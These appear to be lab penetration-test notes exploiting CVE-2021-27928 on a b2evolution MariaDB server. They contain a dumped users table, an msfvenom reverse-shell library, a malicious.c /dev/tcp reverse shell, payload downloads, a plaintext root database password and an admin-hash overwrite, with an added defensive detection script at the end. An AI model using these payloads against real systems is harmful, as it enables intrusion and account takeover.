| evo_messaging__threadstatus |
| evo_plugin_captcha_qstn_13_ip_question |
| evo_plugin_captcha_qstn_13_questions |
| evo_pluginevents |
| evo_plugins |
| evo_pluginsettings |
| evo_pluginusersettings |
| evo_polls__answer |
| evo_polls__option |
| evo_polls__question |
| evo_postcats |
| evo_regional__city |
| evo_regional__country |
| evo_regional__currency |
| evo_regional__region |
| evo_regional__subregion |
| evo_sessions |
| evo_settings |
| evo_skins__container |
| evo_skins__skin |
| evo_slug |
| evo_subscriptions |
| evo_syslog |
| evo_temporary_ID |
| evo_track__goal |
| evo_track__goalcat |
| evo_track__goalhit |
| evo_track__keyphrase |
| evo_users |
| evo_users__fielddefs |
| evo_users__fieldgroups |
| evo_users__fields |
| evo_users__invitation_code |
| evo_users__organization |
| evo_users__profile_visits |
| evo_users__reports |
| evo_users__secondary_user_groups |
| evo_users__user_org |
| evo_users__usersettings |
| evo_widget |
+----------------------------------------+
92 rows in set (0.001 sec)
select * from evo_users;
+---------+------------+----------------------------------+-----------+------------------+-------------+-----------------+---------------+---------------------+----------------+---------------+---------------+----------+------------+-------------+----------------------------------+-------------+--------------+--------------+------------------+--------------+-------------+---------------+--------------+-------------+-----------------------+---------------------+-------------------+-------------------------+
| user_ID | user_login | user_pass | user_salt | user_pass_driver | user_grp_ID | user_email | user_status | user_avatar_file_ID | user_firstname | user_lastname | user_nickname | user_url | user_level | user_locale | user_unsubscribe_key | user_gender | user_age_min | user_age_max | user_reg_ctry_ID | user_ctry_ID | user_rgn_ID | user_subrg_ID | user_city_ID | user_source | user_created_datetime | user_lastseen_ts | user_email_dom_ID | user_profileupdate_date |
+---------+------------+----------------------------------+-----------+------------------+-------------+-----------------+---------------+---------------------+----------------+---------------+---------------+----------+------------+-------------+----------------------------------+-------------+--------------+--------------+------------------+--------------+-------------+---------------+--------------+-------------+-----------------------+---------------------+-------------------+-------------------------+
| 1 | admin | ff825173... | NUDB6eh8 | evo$salted | 1 | admin@localhost | autoactivated | 1 | Johnny | Admin | NULL | NULL | 10 | en-US | GVOKN2gKuUmvg8FbnuyLAPemsVk2Crlz | M | NULL | NULL | NULL | 233 | NULL | NULL | NULL | NULL | 2022-07-26 17:16:55 | 2022-07-26 17:20:43 | 1 | 2022-07-26 17:18:55 |
| 2 | mary | aa31667e... | rexBqE6b | evo$salted | 2 | admin@localhost | autoactivated | 4 | Mary | Wilson | NULL | NULL | 4 | en-US | Z5kfHcq9MhfQnLy2SYoxFpNGzxnhTOPG | F | NULL | NULL | NULL | 233 | NULL | NULL | NULL | NULL | 2022-07-26 17:18:56 | NULL | 1 | 2022-07-26 17:18:55 |
| 3 | jay | 3415c989... | Je1jR2nP | evo$salted | 2 | admin@localhost | autoactivated | 5 | Jay | Parker | NULL | NULL | 3 | en-US | nQzIGvychEpBTBL7hVOGVVeDo7WeWEhT | M | NULL | NULL | NULL | 233 | NULL | NULL | NULL | NULL | 2022-07-26 05:11:49 | NULL | 1 | 2022-07-26 17:18:55 |
| 4 | dave | dee15d7c... | 02Vh93jl | evo$salted | 3 | admin@localhost | autoactivated | 6 | David | Miller | NULL | NULL | 2 | en-US | EsxyhyZLS6QasBedQhJ1X5aBtY60npMD | M | NULL | NULL | NULL | 233 | NULL | NULL | NULL | NULL | 2022-07-25 10:27:06 | NULL | 1 | 2022-07-26 17:18:55 |
| 5 | paul | 1a4cba96... | bO0Qbxp6 | evo$salted | 3 | admin@localhost | autoactivated | 7 | Paul | Jones | NULL | NULL | 1 | en-US | xfq4O1lfb1bQ2127UafXvgwHnNFZhI4Z | M | NULL | NULL | NULL | 233 | NULL | NULL | NULL | NULL | 2022-07-24 10:24:59 | NULL | 1 | 2022-07-26 17:18:55 |
| 6 | larry | 0fd256a1... | E4thLqqZ | evo$salted | 4 | admin@localhost | autoactivated | 8 | Larry | Smith | NULL | NULL | 0 | en-US | Vauk4DrKq6sFaifDREu5ClcYqxIEPPRj | M | NULL | NULL | NULL | 233 | NULL | NULL | NULL | NULL | 2022-07-23 19:28:06 | NULL | 1 | 2022-07-26 17:18:55 |
| 7 | kate | 599bafac... | eW762vXg | evo$salted | 4 | admin@localhost | autoactivated | 9 | Kate | Adams | NULL | NULL | 0 | en-US | vS9Z7FPgxGAfOefkVPwZ5jzkVqxeJMqP | F | NULL | NULL | NULL | 233 | NULL | NULL | NULL | NULL | 2022-07-23 05:24:00 | NULL | 1 | 2022-07-26 17:18:55 |
| 8 | test | f9a86421... | WJVci6K1 | evo$salted | 4 | test@email.com | autoactivated | NULL | | | NULL | NULL | 1 | en-US | nMxLt7Tof7pLo2j7Zx9fUxM91NiKMY9s | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | menu link | 2025-02-18 15:03:06 | 2025-02-18 15:03:06 | 3 | 2025-02-18 15:03:06 |
+---------+------------+----------------------------------+-----------+------------------+-------------+-----------------+---------------+---------------------+----------------+---------------+---------------+----------+------------+-------------+----------------------------------+-------------+--------------+--------------+------------------+--------------+-------------+---------------+--------------+-------------+-----------------------+---------------------+-------------------+-------------------------+
8 rows in set (0.001 sec)
- looking at the hashing, it is the md5(salt.pass) mode
sh
python3 -c 'import pty; pty.spawn("/bin/bash")'
CVE-2021-27928
- https://github.com/Al1ex/CVE-2021-27928
- MySQL version 10.5.8-MariaDB
sh
select version();
+-------------------------------------+
| version() |
+-------------------------------------+
| 10.5.8-MariaDB-1:10.5.8+maria~focal |
+-------------------------------------+
1 row in set (0.001 sec)
sh
www-data@pm:/var/www/html/media/users/test/comments/p20$ uname -m
uname -m
x86_64
sh
msfvenom -p linux/x64/shell_reverse_tcp LHOST=172.16.1.2 LPORT=1235 -f elf-so -o CVE-2021-27928.so
sh
www-data@pm:/tmp$ wget http://172.16.1.2/CVE-2021-27928.so
sh
SET GLOBAL wsrep_provider="/usr/lib/galera/libgalera_smm.so";
sh
www-data@pm:/tmp$ ls -al /usr/lib/galera/libgalera_smm.so
ls -al /usr/lib/galera/libgalera_smm.so
-rw-r--r-- 1 root root 68466736 Oct 22 2020 /usr/lib/galera/libgalera_smm.so
sh
MariaDB [b2evolution]> UPDATE evo_users SET user_pass = 'f9a86421...', user_salt = 'WJVci6K1' WHERE user_ID = 1;
sh
══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 pm pm 220 Feb 25 2020 /home/pm/.bash_logout
-rw------- 1 root root 0 Feb 23 2022 /etc/.pwd.lock
-rw-r--r-- 1 root root 220 Feb 25 2020 /etc/skel/.bash_logout
-rw-r--r-- 1 www-data www-data 2954 Jul 26 2022 /var/www/html/.htaccess
-rw-r--r-- 1 www-data www-data 95 Jul 26 2022 /var/www/html/_cache/.htaccess
-rw-r--r-- 1 landscape landscape 0 Feb 23 2022 /var/lib/landscape/.cleanup.user
sh
-rwxr-xr-x 1 root root 37715 Nov 10 2020 /usr/bin/wsrep_sst_mariabackup
sh
╔══════════╣ Files inside others home (limit 20)
/home/pm/.mysql_history
/home/pm/.sudo_as_admin_successful
/home/pm/.bash_logout
/home/pm/.bash_history
/home/pm/.bashrc
/home/pm/.profile
sh
-rwsr-xr-x 1 root root 31K Feb 21 2022 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
sh
mysql Ver 15.1 Distrib 10.5.8-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2
- compile
malicious.c
c
#include <stdio.h>
#include <stdlib.h>
__attribute__((constructor)) void inject() {
system("bash -c 'bash -i >& /dev/tcp/172.16.1.2/1235 0>&1'");
}
sh
gcc -shared -o /tmp/malicious.so -fPIC malicious.c
sh
www-data@pm:/var/www/html$ wget http://172.16.1.1/malicious.so
www-data@pm:/var/www/html$ chmod +x /usr/lib/galera/malicious.so
sh
python3 -c 'import pty; pty.spawn("/bin/bash")'
- have to run it twice if it fails
- the main issue was that /tmp was not under our control; the library has to live in /var/www/html
sh
mysql -u root -p'B2pMdatAB4sE22!'
MariaDB [(none)]> SET GLOBAL wsrep_provider='/var/www/html/malicious.so';
SET GLOBAL wsrep_provider='/var/www/html/malicious.so';
ERROR 2013 (HY000): Lost connection to MySQL server during query
MariaDB [(none)]> SSET GLOBAL wsrep_provider='/var/www/html/malicious.so';
SET GLOBAL wsrep_provider='/var/www/html/malicious.so';
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id: 6
Current database: *** NONE ***
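As an added, defender-side example (not code from the writeup or from VHL), the check below flags MariaDB builds that fall in the CVE-2021-27928 affected ranges and scans general-log lines for `SET GLOBAL wsrep_provider` pointing outside the packaged Galera directory; the log lines and the allowed-directory assumption are constructed for the example.

```python
"""Added defender-side example (not part of the original writeup): flag
MariaDB versions affected by CVE-2021-27928 and spot wsrep_provider loads
from outside the packaged Galera directory in MariaDB general-log lines."""
import re

# Fixed releases per the CVE-2021-27928 advisory; anything older in that
# branch is affected (10.5.8 on this box falls below 10.5.9).
FIXED = {(10, 2): (10, 2, 37), (10, 3): (10, 3, 28),
         (10, 4): (10, 4, 18), (10, 5): (10, 5, 9)}
ALLOWED_DIR = "/usr/lib/galera/"  # assumption: the only legitimate provider location


def parse_version(s: str) -> tuple:
    """Turn '10.5.8-MariaDB-1:10.5.8+maria~focal' into (10, 5, 8)."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", s)
    if not m:
        raise ValueError(f"unrecognised version string: {s!r}")
    return tuple(int(x) for x in m.groups())


def is_affected(version: str) -> bool:
    v = parse_version(version)
    fixed = FIXED.get(v[:2])
    return fixed is not None and v < fixed


# general_log entries: "<date> <time> <conn_id> Query <sql>" (whitespace varies)
SET_RE = re.compile(
    r"^\s*\S+\s+\S+\s+(\d+)\s+Query\s+SET\s+(?:GLOBAL\s+)?wsrep_provider"
    r"\s*=\s*['\"]?([^'\";]+)", re.IGNORECASE)


def suspicious_provider_loads(log_lines) -> list:
    """Return (connection_id, path) for each wsrep_provider set outside ALLOWED_DIR."""
    hits = []
    for line in log_lines:
        m = SET_RE.match(line)
        if m and not m.group(2).strip().startswith(ALLOWED_DIR):
            hits.append((int(m.group(1)), m.group(2).strip()))
    return hits


SAMPLE_LOG = [  # constructed sample, mirroring the query order in the writeup
    "250218 15:10:01      5 Query    SELECT version()",
    "250218 15:10:20      5 Query    SET GLOBAL wsrep_provider='/usr/lib/galera/libgalera_smm.so'",
    "250218 15:11:02      6 Query    SET GLOBAL wsrep_provider='/var/www/html/malicious.so'",
]

if __name__ == "__main__":
    print("affected:", is_affected("10.5.8-MariaDB-1:10.5.8+maria~focal"))
    for conn, path in suspicious_provider_loads(SAMPLE_LOG):
        print(f"connection {conn} loaded a provider outside {ALLOWED_DIR}: {path}")
```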
